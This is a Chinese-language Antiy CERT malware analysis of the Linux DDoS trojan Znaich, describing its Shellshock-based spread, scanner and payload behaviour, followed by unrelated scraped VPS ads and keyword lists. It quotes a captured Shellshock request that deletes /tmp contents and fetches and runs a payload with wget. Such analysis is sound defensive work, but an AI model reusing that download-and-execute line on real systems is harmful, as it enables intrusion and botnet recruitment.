Znaich分析笔记安天安全研究与应急处理中心(AntiyCERT)Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第2页目录编者按.
11概述.
12感染源.
13样本分析.
34总结.
7附录一:参考资料.
7附录二:关于安天.
7Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第1页编者按安天CERT这篇分析笔记完成于2015年1月18日,但撰写后并未公开,为让安全工作者更进一步了解IoT僵尸网络的威胁,安天CERT决定公开本报告,作为《IOT僵尸网络严重威胁网络基础设施安全》一文的参考资料.
1概述安天CERT关注到近期针对Linux平台的木马十分活跃.
2015年1月13日,MalwareMustDie的日本工作人员HendrikAdrian在推特上发出其分析样本的截图,在1月14日MalwareMustDie官网博客发出分析报告.
有趣的是,同是在1月14日,HendrikAdrian发推表示XOR.
DDoS又回来了,该家族早在2014年9月就已经出现,但也有安全媒体发表文章却称该恶意代码是"新型木马",Avast的报告中也说明了XOR.
DDoS自2014年9月末就已经出现,因此可以得出"新型木马的结论"声音并没有对此事件进行深入研究.
从各方报告来看,1月13日出现的样本与1月14日出现的XOR.
DDoS样本没有关联,下面对1月13日出现的样本进行分析.
2感染源该恶意代码在2015年1月13日被发现,通过"破壳"漏洞进行攻击,根据MalwareMustDie的报告,以下是被检测到的攻击代码:[13/Jan/2015:06:07:18+0100]"GET/HTTP/1.
1"200311bin/bash-c\"rm-rf/tmp/*;echowgethttp://xxxx:81/9521-O/tmp/China.
Z-gxak\x80>>/tmp/Run.
sh;echoechoByChina.
Z>>/tmp/Run.
sh;echochmod777/tmp/China.
Z-gxak\x80>>/tmp/Run.
sh;echo/tmp/China.
Z-gxak\x80>>/tmp/Run.
sh;echorm-rf/tmp/Run.
sh>>/tmp/Run.
sh;chmod777/tmp/Run.
sh;/tmp/Run.
sh\""它利用"破壳"漏洞下载文件至/tmp文件夹中,通过sh脚本运行.
在2015年1月14日MalwareMustDie的报告中,该C&C服务器包含9521及ck.
exe两个文件:Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第2页而在1月16日下午13:19:49秒时,文件已经被替换:Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第3页从截图上看,有359人下载了名为9521的恶意代码.
而另一个名为ck.
exe的文件则是一个漏洞扫描器,恶意代码通过它进行传播.
3样本分析首先分析样本ck.
exe:原始文件名ck.
exeMD54E337BE817E4A667FA695E7980B8B851处理器架构X86-32文件大小1.
7MB(1816064bytes)文件格式BinExecute/Microsoft:EXE[:X86]时间戳2014-11-0804:09:02数字签名NO加壳类型无编译语言MicrosoftVisualC++VT首次上传时间2015-01-1308:05:48VT检测结果5/57病毒名称Trojan/Linux.
ShellShock判定结果恶意Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第4页1、运行后会弹出帮助可以看出,它有三个参数:HostFile、Threads、Address,HostFile为txt格式,内容为扫描的目标ip地址,Threads则是线程数量,Address就是恶意代码的地址.
2、对其反汇编,发现了MalwareMustDie报告中提到了攻击代码,可以看出,该样本扫描有"破壳"漏洞的机器,下载恶意代码并运行下面分析载荷文件9521:原始文件名9521MD5B7E3CA05806AA99CAD9D3768FF90F1D9处理器架构X86-32文件大小604.
4KB(618948bytes)文件格式BinExecute/ELF[:X86]数字签名NO加壳类型无VT首次上传时间2015-01-1306:04:59VT检测结果17/55病毒名称Trojan[DDOS]/Linux.
Znaich判定结果恶意1、样本运行后首先获取系统信息,包括系统版本(通过调用uname())系统时间(调用gettimeofday())Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第5页CPU核心数量及时钟频率(取自/proc/cpuinfo)CPU负载(取自/proc/stat)空闲内存大小及内存总量(取自/proc/meminfo)2、修改rc.
local(利用sed命令):删除末尾的exit0在第二行增加字符串"//ChinaZ"3、解密硬编码的C&C服务器地址Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第6页4、与C&C服务器通信,将之前获取的系统信息通过TCP数据包进行发送5、使用Keep-alive机制检测C&C服务器是否存活Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第7页4总结该样本通过"破壳"漏洞进行传播,为常见的DDOS攻击样本.
但扫描器时间戳为2014年11月,并且攻击者重新上传的样本文件也为2014年的DDOS攻击样本,说明该作者一直在利用"破壳"漏洞进行攻击.
附录一:参考资料[1]来源:MalwareMustDiehttp://blog.
malwaremustdie.
org/2015/01/mmd-0030-2015-new-elf-malware-on.
htmlhttp://pastebin.
com/raw.
phpi=gf4xrB9n[2]来源:KernerMode.
infohttp://www.
kernelmode.
info/forum/viewtopic.
phpf=16&t=3682&sid=7984f41ec2f98ab870c5a613a116d99e附录二:关于安天安天从反病毒引擎研发团队起步,目前已发展成为以安天实验室为总部,以企业安全公司、移动安全公司为两翼的集团化安全企业.
安天始终坚持以安全保障用户价值为企业信仰,崇尚自主研发创新,在安全检测引擎、移动安全、网络协议分析还原、动态分析、终端防护、虚拟化安全等方面形成了全能力链布局.
安天的监控预警能力覆盖全国、产品与服务辐射多个国家.
安天将大数据分析、安全可视化等方面的技术与产品体系有效结合,以海量样本自动化分析平台延展工程师团队作业能力、缩短产品响应周期.
结Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第8页合多年积累的海量安全威胁知识库,综合应用大数据分析、安全可视化等方面经验,推出了应对高级持续性威胁(APT)和面向大规模网络与关键基础设施的态势感知与监控预警解决方案.
全球超过三十家以上的著名安全厂商、IT厂商选择安天作为检测能力合作伙伴,安天的反病毒引擎得以为全球近十万台网络设备和网络安全设备、近两亿部手机提供安全防护.
安天移动检测引擎是全球首个获得AV-TEST年度奖项的中国产品.
安天技术实力得到行业管理机构、客户和伙伴的认可,安天已连续四届蝉联国家级安全应急支撑单位资质,亦是中国国家信息安全漏洞库六家首批一级支撑单位之一.
安天是中国应急响应体系中重要的企业节点,在红色代码、口令蠕虫、震网、破壳、沙虫、方程式等重大安全事件中,安天提供了先发预警、深度分析或系统的解决方案.
关于反病毒引擎更多信息请访问:http://www.
antiy.
com(中文)http://www.
antiy.
net(英文)安天企业安全公司更多信息请访问:http://www.
antiy.
cn安天移动安全公司(AVLTEAM)更多信息请访问:http://www.
avlsec.
com
企鹅小屋怎么样?企鹅小屋最近针对自己的美国cn2 gia套餐推出了2个优惠码:月付7折和年付6折,独享CPU,100%性能,三网回程CN2 GIA网络,100Mbps峰值带宽,用完优惠码1G内存套餐是年付240元,线路方面三网回程CN2 GIA。如果新购IP不能正常使用,请在开通时间60分钟内工单VPS技术部门更换正常IP;特价主机不支持退款。点击进入:企鹅小屋官网地址企鹅小屋优惠码:年付6折优惠...
digital-vm怎么样?digital-vm在今年1月份就新增了日本、新加坡独立服务器业务,但是不知为何,期间终止了销售日本服务器和新加坡服务器,今天无意中在webhostingtalk论坛看到Digital-VM在发日本和新加坡独立服务器销售信息。服务器硬件是 Supermicro、采用最新一代 Intel CPU、DDR4 RAM 和 Enterprise Samsung SSD内存,默认...
印象云,成立于2019年3月的商家,公司注册于中国香港,国人运行。目前主要从事美国CERA机房高防VPS以及香港三网CN2直连VPS和美国洛杉矶GIA三网线路服务器销售。印象云香港三网CN2机房,主要是CN2直连大陆,超低延迟!对于美国CERA机房应该不陌生,主要是做高防服务器产品的,并且此机房对中国大陆支持比较友好,印象云美国高防VPS服务器去程是163直连、三网回程CN2优化,单IP默认给20...
pastebin.com为你推荐
阿丽克丝·布莱肯瑞吉阿丽克斯布莱肯瑞吉演的美国恐怖故事哪两集百度关键词价格查询百度关键词排名价格是多少百花百游百花净斑方多少钱一盒同ip域名两个网站同一个IP怎么绑定两个域名同一服务器网站服务器建设:一个服务器有多个网站该如何设置?m.2828dy.comwww.dy6868.com这个电影网怎么样?www.kaspersky.com.cn卡巴斯基杀毒软件有免费的吗?稳定版的怎么找?baqizi.cc孔融弑母是真的吗?www.15job.com广州天河区的南方人才市场5566.com5566网址大全
免费域名申请 adman 128m内存 紫田 shopex空间 mobaxterm 淘宝双十一2018 标准机柜尺寸 一元域名 彩虹ip 华为网络硬盘 全站静态化 个人域名 gspeed 免费个人空间 服务器托管什么意思 上海服务器 怎么建立邮箱 服务器是干什么用的 web服务器是什么 更多